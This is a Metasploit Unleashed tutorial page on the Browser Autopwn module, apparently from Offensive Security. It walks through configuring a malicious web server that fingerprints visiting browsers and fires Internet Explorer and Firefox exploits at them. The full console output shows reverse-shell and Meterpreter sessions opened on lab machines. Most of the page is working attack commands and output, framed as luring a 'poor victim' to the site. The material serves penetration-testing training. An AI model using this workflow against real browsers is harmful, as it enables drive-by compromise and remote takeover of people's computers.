Notification:  

Add   Edit   Delete   Sort   Print   Change Password   Settings   Permissions

Browser Autopwn

At defcon 17, Metasploit developer Egypt unveiled Browser Autopwn for MSF.  This exciting new module performs browser fingerprinting prior to launching exploits at the victim.  Therefore, if the remote PC is using Internet Explorer 6, it will not launch IE7 exploits at it.  The slide deck for Egypt's presentation is available for your reading pleasure at http://defcon.org/images/defcon-17/dc- 17-presentations/defcon-17-egypt-guided_missiles_metasploit.pdf.

The setup for the 'server/browser_autopwn' module is extremely simple as shown below.

msf > use server/browser_autopwn
msf auxiliary(browser_autopwn) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   LHOST    192.168.1.101    yes       The IP address to use for reverse-connect payloads
   SRVHOST  0.0.0.0          yes       The local host to listen on.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Use SSL
   URIPATH                   no        The URI to use for this exploit (default is random)

msf auxiliary(browser_autopwn) > set uripath /
uripath => /
msf auxiliary(browser_autopwn) >

That's really all there is to the required configuration.  Now let's run it and see what it does.

msf auxiliary(browser_autopwn) > run
[*] Auxiliary module running as background job
msf auxiliary(browser_autopwn) >

[*] Starting exploit modules on host 192.168.1.101...
[*] ---
...snip...
[*] Starting exploit multi/browser/firefox_escape_retval with payload generic/shell_reverse_tcp
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/zCtg7oC
[*]  Local IP: http://192.168.1.101:8080/zCtg7oC
[*] Server started.
[*] Starting exploit multi/browser/mozilla_compareto with payload generic/shell_reverse_tcp
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/vTNGJx
[*]  Local IP: http://192.168.1.101:8080/vTNGJx
[*] Server started.
[*] Starting exploit multi/browser/mozilla_navigatorjava with payload generic/shell_reverse_tcp
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/abmR33jxStsF7
[*]  Local IP: http://192.168.1.101:8080/abmR33jxStsF7
[*] Server started.
[*] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
...snip...
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/RdDDhKANpV
[*] Local IP: http://192.168.1.101:8080/RdDDhKANpV
[*] Server started.

[*] --- Done, found 11 exploit modules

[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.1.101:8080/
[*] Server started.

Now all we need to do is get some poor victim to navigate to our malicious website and when they do, Browser Autopwn will target their browser based on its version.

[*] Request '/' from 192.168.1.128:1767
[*] Request '/?sessid=V2luZG93czpYUDp1bmRlZmluZWQ6ZW4tdXM6eDg2Ok1TSUU6Ni4wO1NQMjo=' from 192.168.1.128:1767
[*] JavaScript Report: Windows:XP:undefined:en-us:x86:MSIE:6.0;SP2:
[*] No database, using targetcache instead
[*] Responding with exploits
[*] Sending Internet Explorer COM CreateObject Code Execution exploit HTML to 192.168.1.128:1774...
[*] Sending Internet Explorer Daxctle.OCX KeyFrame Method Heap Buffer Overflow Vulnerability to 192.168.1.128:1775...
[*] Sending Microsoft Internet Explorer Data Binding Memory Corruption init HTML to 192.168.1.128:1774...
[*] Sending EXE payload to 192.168.1.128:1775...
[*] Sending stage (718336 bytes)
[*] Meterpreter session 1 opened (192.168.1.101:62360 -> 192.168.1.128:1798)
msf auxiliary(browser_autopwn) > sessions -l

Active sessions
===============

  Id  Description  Tunnel
  --  -----------  ------
  1   Meterpreter  192.168.1.101:62360 -> 192.168.1.128:1798

msf auxiliary(browser_autopwn) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer: XP-SP2-BARE
OS      : Windows XP (Build 2600, Service Pack 2).
meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address  : 127.0.0.1
Netmask     : 255.0.0.0



AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:41:f2:e8
IP Address  : 192.168.1.128
Netmask     : 255.255.0.0


meterpreter >

Very slick operation!  And it's not just limited to Internet Explorer.  Even Firefox can be abused.

[*] Request '/' from 192.168.1.112:1122
[*] Request '/?sessid=V2luZG93czpYUDp1bmRlZmluZWQ6ZnItRlI6eDg2OkZpcmVmb3g6MTo=' from 192.168.1.112:1122
[*] JavaScript Report: Windows:XP:undefined:fr-FR:x86:Firefox:1:
[*] No database, using targetcache instead
[*] Responding with exploits
[*] Request '/favicon.ico' from 192.168.1.112:1123
[*] 404ing /favicon.ico
[*] Sending Mozilla Suite/Firefox InstallVersion->compareTo() Code Execution to 192.168.1.112:1124...
[*] Sending Mozilla Suite/Firefox Navigator Object Code Execution to 192.168.1.112:1125...
[*] Sending Firefox 3.5 escape() Return Value Memory Corruption to 192.168.1.112:1123...
[*] Sending Mozilla Suite/Firefox InstallVersion->compareTo() Code Execution to 192.168.1.112:1125...
[*] Command shell session 3 opened (192.168.1.101:56443 -> 192.168.1.112:1126)

msf auxiliary(browser_autopwn) > sessions -i 3
[*] Starting interaction with 3...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program Files\Mozilla Firefox>hostname
hostname
dookie-fa154354

C:\Program Files\Mozilla Firefox>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . : dookie
        IP Address. . . . . . . . . . . . : 192.168.1.112
        Subnet Mask . . . . . . . . . . . : 255.255.0.0
        Default Gateway . . . . . . . . . : 192.168.1.1

C:\Program Files\Mozilla Firefox>




© Offensive Security 2009